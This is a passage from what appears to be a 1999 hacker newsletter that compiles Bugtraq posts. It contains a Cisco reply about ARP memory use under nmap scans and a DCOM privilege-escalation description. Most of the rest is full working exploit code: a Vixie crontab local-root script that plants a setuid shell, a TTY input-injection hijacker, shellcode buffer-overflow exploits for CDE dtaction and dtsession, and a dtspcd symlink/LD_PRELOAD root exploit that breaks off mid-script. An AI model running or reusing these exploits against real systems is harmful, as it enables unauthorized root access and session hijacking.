Fs8gLV3CPnW7YdSpveosI3hBY9WNCVAFx9WkM5+n+FBSRfbRzFJkkblN85ZCz7pI +RXg6Sv5vuzy6SRxMRK2vu1FXuwZevVQaMq4ANUXpdo5MyUE8rMGb9PLWdxOxdf5 s6zlG0oFyvI= =CqoX -----END PGP SIGNATURE----- This is the moderated mailing list freebsd-announce. The list contains announcements of new FreeBSD capabilities, important events and project milestones. See also the FreeBSD Web pages at http://www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-announce" in the body of the message ----- End forwarded message ----- -- Patrick Oonk - PO1-6BONE - patrick@pine.nl - www.pine.nl/~patrick Pine Internet B.V. PGP key ID BE7497F1 Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- Excuse of the day: Your Flux Capacitor has gone bad. *** END PGP VERIFIED MESSAGE *** @HWA 46.0 Cisco and Nmap Dos ~~~~~~~~~~~~~~~~~~ Subject: Re: Cisco and Nmap Dos To: BUGTRAQ@SECURITYFOCUS.COM Hi all, I wanted to address the items listed here. We are still investigating this problem, and hope to have more information later on in the week. Item 1, OSPF is not an issue. According to the configuration information provided to us by the customer, OSPF is not in use. Items 2, 3 & 4. IOS actually handles ARP in the following manner: When we receive a packet destined for something not already in our ARP table, we enter an "incomplete" entry in the ARP table. Then we will rate limit ARPs to once every 2 seconds to that destination. Any additional packets to that same destination will be dropped until the ARP entry is completed. This is on a per destination basis. "Incompletes" (ARP requests that have not been responded to) get dropped after approximately 1 minute from the last time we sent an ARP request for that non existent address. Incomplete entries MAY stay around longer, as the process that is responsible for cleaning up the ARP table may not have enough time to complete before it is called again, if we have a lot to clean up, which may be relevant to this case. The incomplete entries will eventually get cleaned up, but it may take two or three minutes, two or three cycles of the process that cleans up the table. Under a dedicated, intense nmap scan, a very large number of ARP requests may be generated, causing the ARP table to grow very large with "incomplete" entries. These entries consume memory. As the amount of free memory declines and demand on the processor to handle outstanding packets increases, ARP processing falls behind and throughput on the router may decline significantly. Once the scan is stopped, processing catches up and things return to normal. So, to my knowledge IOS should be doing the right thing, we only queue one ARP request at a time, every 2 seconds, until the ARP entry is resolved, we rate limit requests, dropping all additional packets, until the ARP entry is resolved, and we clean up the outstanding incomplete requests within a few minutes. I hope that helps address some of the concerns put forth. Hopefully we will have further updates shortly. Thank you, Lisa Napier Product Security Incident Response Team Cisco Systems At 04:04 PM 9/2/1999 +0200, Mikael Olsson wrote: >There could be a couple of problems that I know of... > >The problem(s) here may be >1) OSPF : Remembering every single IP as separate routes. > I don't know the timeouts or memory usage for OSPF > routes, so I won't try to dig to deep into that. This should be > easily verifiable by just checking the routing table on > the router, should it be the case. >2) ARP resolution : Any number of packets to the same IP may be > queued, instead of just one per IP which is the sane thing to do. >3) ARP resolution : There are no checks to see if there's a huge > number of requests waiting. If there is, the router should just > kill old requests. >4) ARP resolution : The router remembers not only addresses that have > been found, > but also addresses that could NOT be found. This way, it > doesn't keep retrying several times per second but rather > once every 10-30 seconds (if someone still wants to talk to that > host, of course). > Here, the problem may be that it doesn't delete old "not found" > records if there's a disproportionate amount of them. > >The most probable one is number one. > >If you don't want the gory details in this discussion, >skip to </boringtechstuff>. >The conclusion is more interesting than the math. > ><boringtechstuff> > > >Let's do some math on the ARP part: > >Assume that all hosts are local to the router. >It took you 18 hours to complete 256^3 = 16M addresses. >16M hosts in 18 hours (64800 secs) means 250 hosts scanned per second. > >This would amount to app. 100 kbps load (assuming each host is only >pinged once). This doesn't make any sense, but I'll go ahead anyway :-) > >First we look at the case where packets are buffered. > >Assume the router buffers packets with unknown destination for >one second. >Each buffer would be 14 ether + 20 ip + 8 icmp + 4 data = 46 >bytes, plus internal data such as mbuf-equivalent links. Let's >assume each buffer eats 64 bytes. >64 * 250 = 16K used on average. >Hmm this does not seem to be the case. Even assuming nmap pings >four times per host and that each packet is buffered for >three seconds, it would only amount to 192K. > >Let's look at remembering ARP entries that are not found. >Assume each ARP entry eats 4 ip + 6 ether + 2 timeout + 2 flags >+ 2 bytes proto type + 2 byte hw type + ~8 bytes hash bucket >linkage (or something) = 26 bytes. >Assume each entry lives for 30 seconds. >250 * 30 * 26 = 195K. >Even with IPv6 address size allocation and long timeouts, >it doesn't amount to more than a couple of megs. > >Ack.. > >Even with both combined, it doesn't even come near to 35 MB. > >A quick look at the OSPF problem would say >so la la 20 bytes per route, route life time of 1 hour: >1 million hosts scanned per hour, 20 bytes per route, >gives an AVERAGE OF TWENTY MB RAM USED. > >This would seem more probable. > >By starting a scan and seeing how the memory grows, you >should see that it keeps growing for maybe 30 minutes, >maybe 1 hour, maybe 2 hours (route life) and then stays >at the same level. >When you stop scanning, it should take the same time >for the memory usage to decrease to normal levels. > ></boringtechstuff> > >Either there's a flaw in the routing kernel that I have no >idea about, or the problem is OSPF. > >As I said, you should be able to verify OSPF behaviour either >by checking the routing table from the console, or polling >it via SNMP. I've noticed on some brands that the console >only displays static and RIPped routes, but that SNMP >displays all; keep that in mind. > >You should be able to amend this problem by adding static >routes without destination for IP spans known to be empty. > >Hope this helps? >Regards, >Mikael Olsson > > >"Lancashire, Andrew" wrote: > > > > I don't know if you've ever seen this before. We ran nmap with ICMP > > discover and standard tcp scan. We ran the scan against the entire 10.0.0.0 > > network range. Although we were only looking for 2 ports, we found that the > > RSM in our 5500 series (our default route) was running out of memory and > > had to be rebooted by our Network Services group multiple times in the 18 > > hour stretch it took to complete. One of the interesting things is that we > > were only generating about 3-5 Mbs and the 5500 can pass Gigabits. I have > > not heard of this problem before. We contacted Cisco and sent them the > > details. Below is the response to one of our engineers. > > > > Andrew > > > > -----Original Message----- > > From: khollis [SMTP:khollis@cisco.com] > > Sent: Tuesday, August 31, 1999 7:59 AM > > To: wescotd@sutterhealth.org > > Subject: Regarding Case Number V44290 > > > > Hi Dave, as I recall, the symptom we had to work/troubleshoot with was the > > router consumed lots of memory. Never heard about packets being dropped. So > > it seems like we forwarded everything nmap sent to us. The thing to keep in > > mind is that the router will dynamically allocate memory as necessary so > > that it can keep up with the load provided to it. Although we did not know > > nmap was running at the time, we noticed the memory consumed by the IP Input > > process dropped from 40M+ to an acceptable level of (4-5M) after nmap was > > shut down. This proves that the router need this much memory to process the > > entire load generated by nmap. > > > > I suspect nmap was doing much more than you've been able to calculate. It's > > obvious that running nmap continuously for 18-19 hours caused this problem. > > One possible explaination is constantly flooding the router w/64 byte > > packets for this timeframe could have caused the router's memory to become > > seriously fragmented. Also, I guess we can't tell, but another question > > would be how many tcp sessions were requested/open on the router after this > > timeframe? > > > > Port scanners have a reputation of helping identify potential security > > problems. However, they are also known to cause problems... > > > > Hope this helps, > > KennyH. > >-- >Mikael Olsson, EnterNet Sweden AB, Box 393, S-891 28 �RNSK�LDSVIK >Phone: +46-(0)660-105 50 Fax: +46-(0)660-122 50 >WWW: http://www.enternet.se E-mail: mikael.olsson@enternet.se @HWA 47.0 Vixie Crontab exploit code ~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Vixie Crontab exploit code To: BUGTRAQ@SECURITYFOCUS.COM Vixie Crontab exploit code begin vixie-ex ---------------------------------------------------------------------- #!/bin/sh # Vixie crontab exploit # # Local user can gain root access. # # Tested redhat linux : 4.2, 5.0, 5.1, 6.0 # Tested vixie crontab version : 3.0.1 # # This program is only for demonstrative use only. # USE IT AT YOUR OWN RISK! # # Programmed by Taeho Oh 1999/08/31 # # Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara # PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus # PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin export PATH echo echo "Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara" echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus" echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug" echo echo make shell echo cat > /tmp/sh.c << EOF #include<unistd.h> #include<stdlib.h> int main() { setuid(0); setgid(0); execl("/bin/sh","sh",0); return 0; } EOF echo compile shell echo cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c echo make execute shell script echo cat > /tmp/makesh << EOF #!/bin/sh chown root /tmp/sh chgrp root /tmp/sh chmod 4755 /tmp/sh EOF chmod 755 /tmp/makesh echo hack sendmail.cf echo cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1 sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2 sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3 cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf rm -f /tmp/sendmail.cf.tmp1 rm -f /tmp/sendmail.cf.tmp2 rm -f /tmp/sendmail.cf.tmp3 echo make cron file echo cat > /tmp/cronfile << EOF MAILTO=-C/tmp/sendmail.cf `whoami` * * * * * ls EOF echo input cron file echo crontab /tmp/cronfile echo wait for 1 minute echo sec=`date +%S` wait=`expr 65 - $sec` sleep $wait echo execute shell echo /tmp/sh echo delete data files echo cd /tmp rm -f sendmail.cf cronfile makesh sh.c crontab /dev/null ---------------------------------------------------------------------- end vixie-ex -- Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug @HWA 48.0 Exploiting DCOM to gain Administrative rights on Windows NT 4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Exploiting DCOM to gain Administrative rights on Windows NT 4 To: BUGTRAQ@SECURITYFOCUS.COM By using a combination of problems it is a relatively easy matter for a local user to gain administrative rights on a Windows NT 4 Server or Workstation, though this situation is easily rectifiable. 1) The default configuration permissions on Windows NT allow the Interactive User, that is the user currently logged on, to make modifications to the way a DCOM server should be run. Basically this means they can modify the subkeys under the HKCR\AppID registry key where information pertaining to the way these servers should be run is stored. Choosing an example that'll be on the majority of machines consider Wordpad. Wordpad is a registered DCOM server. By navigating to the HKCR\AppID\{73FDDC80-AEA9-101A-98A7-00AA00374959} registry key and adding a new value, "LocalService", and supplying the name of a system service a normal user will be able to start (a service) one of their choosing. 2) After an install of certain software by an administrator new system services can be registered, but not necessarily started automatically. Added to this the NTFS rights on the service's image file may be lax. Consider an install of Internet Explorer 5. A system service, the System Event Notification service or SENS, is registered under the HKLM\CurrentControlSet\Services registry key but is not started. The default NTFS rights allow Everybody to overwrite the file. Overwriting a service's image file with an "exploit" and getting it to run as system is hardly brain surgery, in so far as using it in a way to leverage more access to a system is concerned anyway. The problem lies in trying to get the service to run - a normal user just can't open the Services Control Panel applet and start a service. Enter DCOM - stage right. Using a simple VBScript in an HTML document, such as <SCRIPT LANGUAGE="VBScript"> CreateObject("Wordpad.Document.1") </SCRIPT> an opening it will cause the browser request of the COM Service Control Manager (RPCSS.EXE) that it start the server so it can create an instance of the wordpad.document.1 class. RPCSS looks at the HKCR\AppID\{73FDDC80-AEA9-101A-98A7-00AA00374959} key and decides how to start it. Going back to stage 1) above let's assume we supplied "SENS" as the data for the LocalService we added. RPCSS will go ahead and start the SENS service because the default launch permissions allow the Interactive User to do so. All that this takes is for one of the HKCR\AppID registry key to have the default permissions and for a normal user to be able to overwrite one .exe or .dll that a non-started system service uses for an NT system to be vulnerable. Needless to say tightening the permissions of the relevant keys and files will resolve this problem. NB ~ Windows 2000 will allow Power Users, Server Operators etc to gain Admin rights using similar methods. Cheers, David Litchfield http://www.arca.com http://www.infowar.co.uk/mnemonix @HWA 49.0 linux tty hijacker by typo/teso ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #include <sys/ioctl.h> #include <sys/types.h> #include <signal.h> #include <stdio.h> #include <fcntl.h> #include <stdlib.h> #include <unistd.h> #include <termios.h> // Dirty H(ijacker|arry) by typo/teso.. paralell tailing and ioctl input // don't work.. neither does nonblocking tailing. any suggestions on how // to improve this ? -> typo@scene.at // credits: Saegfault for some ideas regarding the tail mode. char *moo; int fd; void inthand() { printf("moo!\n"); free(moo); close(fd); exit(-1); } int main(int argc, char **argv) { char *moo2; printf("-- Dirty H(ijacker|arry) by typo/teso --\n"); if (argc<2) { printf("Usage: %s </dev/ttyx> [tailmode]\n",argv[0]); exit(-1); } signal(SIGINT, (void*)&inthand); moo2 = moo = (char *)malloc(400); if (argc>2) { fd = open(argv[1], O_RDONLY|O_SYNC); printf("Tailing %s""... all commands we receive won't reach the shell:\n", argv[1]); while (1) { read(fd,moo,1); printf("%s",moo); if (!strcmp(moo,"\r")) printf("\n"); fflush(stdout); } } else { fd = open(argv[1], O_WRONLY); printf("Inserting Commands into %s"":\n", argv[1]); while (1) { moo = moo2; fgets(moo, 400, stdin); while (*moo) ioctl(fd, TIOCSTI, moo++); } } } @HWA 50.0 Various Vulnerabilities in CDE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #1 Dtaction Subject: Vulnerability in dtaction To: BUGTRAQ@SECURITYFOCUS.COM Hello, I discovered the following security problem in dtaction, part of CDE: Description ----------- /usr/dt/bin/dtaction contains a buffer overflow when a username of more than 1024 bytes is supplied as an argument. Impact ------ The buffer overflow can lead to local root compromise. Workaround ---------- dtaction allows local or remote invocation of an 'Action' as any user. This is why dtaction is setuid root. If this feature is not needed the setuid bits can be removed: as root type: chmod 555 /usr/dt/bin/dtaction dtaction can then still be used to invoke local and remote 'Actions' as the user invoking dtaction. Affected systems ---------------- Although the overflow is present in most implementations, exploiting it is very much system dependent. Below an example exploit for Solaris 7 x86 is is given. The only systems I have checked were: Solaris 7, 2.6, 2.5.1 Background ---------- Despite the fact that Georgi Gunski found a buffer overflow in dtaction in 1997, no-one apparently checked dtaction any further. The overflow that was discovered then appeared to be due to a bug in the shared library libDtSvc.so, which was subsequently fixed. Even though the Sun Security Bulletin 164 at that time said: Due to insufficient bounds checking on arguments supplied to dtaction, it is possible to overwrite the internal stack space of dtaction. As dtaction is setuid root, this vulnerability may be exploited to gain root access. Apparently not all user supplied arguments were checked. Supplying a username over 1024 with the argument -user will overflow an internal buffer used to log a message to /var/adm/sulog. Although the overflow can succeed, a message will always be logged to /var/adm/sulog. The overflow is in a function called AddSuLog, which is called from a function LogFailure, which in turn is called from a function UnknownUser: The code at the end of the routine UnkownUser() looks like this (all on Solaris 2.6): UnknownUser+0x025c: call LogFailure UnknownUser+0x0260: nop UnknownUser+0x0264: call 0x00023904 [unresolved PLT 54: XmStringFree] UnknownUser+0x0268: mov %i3, %o0 UnknownUser+0x026c: call 0x00023904 [unresolved PLT 54: XmStringFree] UnknownUser+0x0270: mov %i2, %o0 UnknownUser+0x0274: call 0x00023910 [unresolved PLT 55: XtFree] UnknownUser+0x0278: mov %i4, %o0 UnknownUser+0x027c: sethi %hi(0x23c00), %o0 UnknownUser+0x0280: call 0x000237a8 [unresolved PLT 25: XtAppMainLoop] UnknownUser+0x0284: ld [%o0 + 0x3c4], %o0 UnknownUser+0x0288: ret UnknownUser+0x028c: restore According to the discription of XtAppMainLoop, it will never return. This will make the overflow not exploitable on systems where the return address on the stack is for the caller of the caller (like sparc). However, when we inspect the function XtAppMainLoop on Solaris 2.6 we find: XtAppMainLoop : save %sp, -0xc0, %sp XtAppMainLoop+0x0004: tst %i0 XtAppMainLoop+0x0008: be XtAppMainLoop+0x30 XtAppMainLoop+0x000c: add %fp, -0x60, %o1 XtAppMainLoop+0x0010: ld [%i0 + 0x224], %o0 XtAppMainLoop+0x0014: tst %o0 XtAppMainLoop+0x0018: be XtAppMainLoop+0x30 XtAppMainLoop+0x001c: add %fp, -0x60, %o1 XtAppMainLoop+0x0020: ld [%i0 + 0x224], %o1 XtAppMainLoop+0x0024: jmpl %o1, %o7 XtAppMainLoop+0x0028: mov %i0, %o0 XtAppMainLoop+0x002c: add %fp, -0x60, %o1 XtAppMainLoop+0x0030: call 0xef5a193c [unresolved PLT 181: XtAppNextEvent] XtAppMainLoop+0x0034: mov %i0, %o0 XtAppMainLoop+0x0038: call 0xef5a1948 [unresolved PLT 182: XtDispatchEvent] XtAppMainLoop+0x003c: add %fp, -0x60, %o0 XtAppMainLoop+0x0040: ldsb [%i0 + 0x21c], %o0 XtAppMainLoop+0x0044: tst %o0 XtAppMainLoop+0x0048: be XtAppMainLoop+0x30 XtAppMainLoop+0x004c: add %fp, -0x60, %o1 XtAppMainLoop+0x0050: tst %i0 XtAppMainLoop+0x0054: be XtAppMainLoop+0x78 XtAppMainLoop+0x0058: nop XtAppMainLoop+0x005c: ld [%i0 + 0x228], %o0 XtAppMainLoop+0x0060: tst %o0 XtAppMainLoop+0x0064: be XtAppMainLoop+0x78 XtAppMainLoop+0x0068: nop XtAppMainLoop+0x006c: ld [%i0 + 0x228], %o1 XtAppMainLoop+0x0070: jmpl %o1, %o7 XtAppMainLoop+0x0074: mov %i0, %o0 XtAppMainLoop+0x0078: ret XtAppMainLoop+0x007c: restore It seems that this function might end if a certain test fails. It is unclear if this is a test under control of the user. Below is a simple C program which shows the problem on Solaris 7 x86, which has a stack with the return address of the caller on it. Regards, Job --- Job de Haas job@itsx.com ITSX bv http://www.itsx.com -------8<----------------------------------------------------------------- /* * dtaction_ov.c * Job de Haas * (c) ITSX bv 1999 * * This program demonstrates an overflow problem in /usr/dt/bin/dtaction. * It has only been tested on Solaris 7 x86 * assembly code has been taken from ex_dtprintinfo86.c by unewn4th@usa.net * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <pwd.h> #define BUFLEN 998 char exploit_code[] = "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0" "\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff" "\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33" "\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88" "\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f" "\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46" "\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01" "\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/id"; main() { char *argp[6], *envp[3]; char buf[2048]; unsigned long *p; struct passwd *pw; int buflen; if ((pw = getpwuid(getuid())) == NULL) { perror("getpwuid"); exit(1); } buflen = BUFLEN - strlen( pw->pw_name ); memset(buf,0x90,buflen); strncpy( &buf[500], exploit_code, strlen(exploit_code)); /* set some pointers to values that keep code running */ p = (unsigned long *)&buf[buflen]; *p++ = 0x37dc779b; *p++ = 0xdfaf6502; *p++ = 0x08051230; *p++ = 0x080479b8; /* the return address. */ *p++ = 0x08047710; *p = 0; argp[0] = strdup("/usr/dt/bin/dtaction"); argp[1] = strdup("-u"); argp[2] = strdup(buf); argp[3] = strdup("Run"); argp[4] = strdup("/usr/bin/id"); argp[5] = NULL; if (!getenv("DISPLAY")) { printf("forgot to set DISPLAY\n"); exit(1); } envp[0] = malloc( strlen("DISPLAY=")+strlen(getenv("DISPLAY"))+1); strcpy(envp[0],"DISPLAY="); strcat(envp[0],getenv("DISPLAY")); envp[1] = NULL; execve("/usr/dt/bin/dtaction",argp,envp); } ******************************************************************************** #2, DTsession Subject: Vulnerability in dtsession To: BUGTRAQ@SECURITYFOCUS.COM Hello, I discovered the following security problem in dtsession (actually in libtt.so), part of CDE: Description ----------- The session manager dtsession contains an overflow vulnerability when parsing the environment variable TT_SESSION. Impact ------ Due to the fact that dtsession is running setuid root and does not remove the root privilege (at least as tested on Solaris), the overflow can lead to local root compromise. Workaround ---------- I'm not quite sure what all the reasons are for dtsession having the setuid bit turned on. Removing the setuid bit would at least lead to failure of the password checking when unlocking a screen (due to the shadow file being only readable by root). For personal workstation use this might be acceptable. Affected systems ---------------- dtsession is part of CDE which is used by multiple UNIX vendors (among others: Sun, HP, Compaq (Digital), IBM, Novell, SCO) It looks like most systems running CDE are vulnerable, although the only systems I have checked were: Solaris 7, 2.6, 2.5.1 Background ---------- The dtsession program performs session management for CDE. It does this in cooperation with ToolTalk. The ToolTalk library parses an environment string that informs it of an already running ttsession daemon. When parsing this environment variable it fails to check the size before calling sscanf(). The environment variable looks like this: TT_SESSION=01 18176 1289637086 1 0 1000 10.0.0.10 4 When a string larger than 280 bytes is used for the IP address (10.0.0.10), it will overflow the stack. Regards, Job --- Job de Haas job@itsx.com ITSX bv http://www.itsx.com -------8<----------------------------------------------------------------- /* * ovsession.c * Job de Haas * (C) ITSX BV 1999 * * Some proof of concept code (== really ugly, barely working) at exploiting * an overflow in libtt.so when parsing the TT_SESSION string. * Only tested on a Solaris 2.6 sun4c sparc, with and without patch 105802-07 * based loosly on code by horizon <jmcdonal@unf.edu> * Somehow the overflow is very sensitive to caching of the stack. To see that * it really does work, run it in a debugger and set a break point in tt_open() * when that is reached, set a breakpoint in sscanf and continue. When that is * reached continue again and it will either crash or execute a shell. */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/systeminfo.h> #include <unistd.h> #include <string.h> #define BUF_LEN 280 char exploit[] = "\220\33\100\15\202\20\40\27\221\323\100\15\220\33\100\17\ \220\2\40\10\320\43\277\370\224\2\40\11\332\52\277\377\ \332\43\277\374\220\33\140\1\202\20\40\6\221\323\100\15\ \220\33\100\15\202\20\40\51\221\323\100\15\320\3\277\370\ \222\43\240\10\224\43\240\4\202\20\40\73\221\323\100\15\ \232\33\100\15\232\33\100\15\232\33\100\15\232\33\100\15\ \232\33\100\15\232\33\100\15\232\33\100\15\232\33\100\15\ \177\377\377\344\232\33\100\15\57\142\151\156\57\153\163\150QQQ"; #if patched #define got 0xef6d2be0 #else #define got 0xef6d2f84 #endif main() { char *argp[6], *envp[20]; char buf[3072]; char *ttsess; char *display; u_long *longp; char data[512]; char padding[64]; char platform[256]; int pad=31; int i; memset(buf,0,3072); memset(buf,'a',BUF_LEN); longp = (unsigned long *)(buf+BUF_LEN); /* %l0 - %l7 */ *longp++ = 0xdeadcafe; *longp++ = 0xdeadcafe; *longp++ = 0xdeadcafe; *longp++ = 0xdeadcafe; *longp++ = 0xdeadcafe; *longp++ = 0xdeadcafe; *longp++ = 0xdeadcafe; *longp++ = 0xdeadcafe; /* %i0 - %i7 */ *longp++ = 0xdeadcafe; *longp++ = 0xefffff94; /* make sure %i1 can be used */ *longp++ = 0xdeadcafe; *longp++ = got; /* also used before we get to the exploit */ *longp++ = 0xdeadcafe; *longp++ = 0xdeadcafe; *longp++ = 0xefffffb0; /* frame with some necessary values */ *longp++ = 0xeffffdd0; /* return into the exploit code */ longp=(unsigned long *)data; *longp++=0xdeadbeef; *longp++=0xdeadbeef; *longp++=0xdeadbeef; *longp++=0xdeadbeef; *longp++=0xdeadbeef; *longp++=0xffffffff; *longp++=0xdeadbeef; *longp++=0; *longp++=0xefffffb4; *longp++=0x01; *longp++=0xef6dc154; *longp++=0xeffffd26; *longp++=0x00; argp[0] = strdup("/usr/dt/bin/dtsession"); argp[1] = NULL; if (!getenv("DISPLAY")) { printf("forgot to set DISPLAY\n"); exit(1); } sysinfo(SI_PLATFORM,platform,256); pad+=20-strlen(platform)-strlen(argp[0]); for (i=0;i<pad;padding[i++]='C') padding[i]=0; /* create an enviroment size independent of the size of $DISPLAY */ display = malloc( 8 + strlen(getenv("DISPLAY")) + 1); strcpy(display,"DISPLAY="); strcat(display+8,getenv("DISPLAY")); envp[0] = display; envp[1] = malloc(60); memset(envp[1], 0, 60); memset(envp[1], 'a', 60 - strlen(envp[0])); strncpy(envp[1],"W=",2); /* put the exploit code in the env space (easy to locate) */ envp[2] = strdup(exploit); /* create the overflow string */ ttsess = strdup("TT_SESSION=01 18176 1289637086 1 0 1000 %s 4"); envp[3] = malloc( strlen(ttsess) + strlen(buf)); sprintf(envp[3],ttsess,buf); /* make it easier to debug, probably smarter ways to do this */ envp[4] = strdup("LD_BIND_NOW=1 "); /* put some data in the environment to keep the code running after the overflow, but before the return pointer is used. includes NULL ptrs */ envp[5]=(data); envp[6]=""; envp[7]=""; envp[8]=""; envp[9]=&(data[32]); envp[10]=""; envp[11]=""; envp[12]=&(data[39]); envp[13]=""; envp[14]=""; envp[15]="\010"; envp[16]=padding; envp[17]=NULL; execve("/usr/dt/bin/dtsession",argp,envp); } ******************************************************************************** #3, DTspcd, geez they really need to fix CDE huh?... - Ed Subject: Vulnerability in dtspcd To: BUGTRAQ@SECURITYFOCUS.COM Hello, I discovered the following security problem in dtspcd, part of CDE: Description ----------- The CDE subprocess daemon /usr/dt/bin/dtspcd contains an insufficient check on client credentials. Impact ------ The insufficient check can lead to a local root compromise. Workaround ---------- Unknown. Affected systems ---------------- The only systems I have checked were: Solaris 7, 2.6, 2.5.1 However I strongly suspect most systems running CDE to be vulnerable. Background ---------- The CDE subprocess daemon allows cross-platform invocation of applications. To achieve this it is registered by inetd: dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd dtspc 6112/tcp # CDE subprocess control In order to authenticate the remote user, the daemon generates a filename which is to be created by the client and then is verified by the daemon. When verifying the created file, the daemon uses stat() instead of lstat() and is subsequently vulnerable to a symlink attack. Further more the daemon seems to allow empty usernames and then reverts to a publicly write-able directory (/var/dt/tmp). I discovered this accidentally, but later read that also unreadable home directories result in this behavior. The process can be followed fairly well by setting the -log and -debug options on dtspcd (in /etc/inetd.conf). It will create a log file in /var/dt/tmp/DTSPCD.log. This will show information like: --> REGISTER channel: 0, request: 4, length: 33, seq: 1 data: 4 Client protocol version is '1000'.: Mon Sep 13 10:32:33 1999 +++> Authentication file is '/var/dt/tmp/.SPC_AAA0RIUwK'.: Mon Sep 13 .. Both these bugs can be combined to convince dtspcd it should execute an action as root. The script below performs all necessary actions on a Solaris host. It makes use of the dtaction command of which the behavior is modified by pre-loading a shared library with modified libc functions. As a side note: Another thing I dislike is the way vendors sometimes silently release patches (or didn't I watch closely enough?) In Solaris 2.6 a security problem in the linker was fixed which I never saw mentioned anywhere. When specifying LD_PROFILE=libc.so.1 in the environment and executing a setuid root program, a file /var/tmp/libc.so.1.profile is created as root. This file is vulnerable to a symlink attack. To fix this problem a recommended patch exists for Solaris 2.6. Another feature of dtspcd, which was not obvious to me, is that it will allow remote access to all systems that share NFS exported home directories without requesting a password. Regards, Job --- Job de Haas job@itsx.com ITSX bv http://www.itsx.com -------8<----------------------------------------------------------------- #!/bin/sh # # dtspaced # Demonstration of local root hole with dtspcd. # Job de Haas # (c) 1999 ITSX bv # # Mechanism is as follows: # - dtaction requests the action 'Execute' through dtspcd. # - dtscpd request a filename to be created which it will check for # owner/suid bit. # - BUG1: dtspcd allows creation in a public directory (with empty # username). # - BUG2: and forgets to check if the file is a symlink. # - dtaction will create a symlink to a suid root binary and reply. # - dtspcd considers dtaction authenticated and executes requested file # as root. # # suggested fix: use lstat or refuse a symlink and why allow an empty # username? # # exploit uses a shared lib to replace some functions to do what we want. # Note that these are not used by dtspcd but by dtaction. The script executed # by dtaction as root creates a file /tmp/root_was_here. # # tested on Solaris 2.5.1, 2.6 and 7 # if [ -f /tmp/root_was_here -o -d /tmp/root_was_here ]; then echo "/tmp/root_was_here already exists" exit fi if [ "X$DISPLAY" = "X" ]; then echo "need to set DISPLAY" exit fi cat > /tmp/dtspaced.c << EOF #include <pwd.h> #define O_CREAT 0x100 #define O_RDONLY 0 #if __SunOS_5_5_1 #define open64 open #define _open64 _open #endif open64(const char * filename, int flag, int mode) { if ((flag & O_CREAT) && ( strstr( filename, "SPC") )) { symlink( "/usr/bin/passwd", filename); filename = (char *)strdup("/tmp/shit"); unlink(filename); } return(_open64(filename, flag, mode)); } chmod(const char * filename, int mode) { _chmod( filename, mode); return(0); } struct passwd *getpwuid(uid_t uid) { struct passwd *pw; pw = (struct passwd *)_getpwuid(uid); pw->pw_name = (char *)strdup(""); return(pw); } EOF cat > /tmp/doit << EOF #!/bin/sh unset LD_PRELOAD /usr/bin/touch /tmp/root_was_here EOF chmod a+x /tmp/doit mkdir /tmp/.dt cat > /tmp/.dt/hack.dt << EOF set DtDbVersion=1.0 ACTION Execute { LABEL Execute TYPE COMMAND WINDOW_TYPE NO_STDIO EXEC_STRING \ "%(File)Arg_1"File To Execute:"%" DESCRIPTION The Execute action runs a shell script or \ binary executable. It prompts for options and \ arguments, and then executes the script or \ executable in a terminal window. } EOF DTDATABASESEARCHPATH=/tmp/.dt export DTDATABASESEARCHPATH # make a copy of dtaction so it is not suid root and will accept LD_PRELOAD cp /usr/dt/bin/dtaction /tmp echo "Compiling shared lib..." cc -c /tmp/dtspaced.c -o /tmp/dtspaced.o ld -G /tmp/dtspaced.o -o /tmp/dtspaced.so LD_PRELOAD=/tmp/dtspaced.so export LD_PRELOAD echo "Executing dtaction..." /tmp/dtaction -execHost 127.0.0.1 Execute /tmp/doit unset LD_PRELOAD /bin/rm -f /tmp/doit /tmp/dtaction /tmp/shit /tmp/dtspaced.* /bin/rm -rf /tmp/.dt if [ -f /tmp/root_was_here ]; then 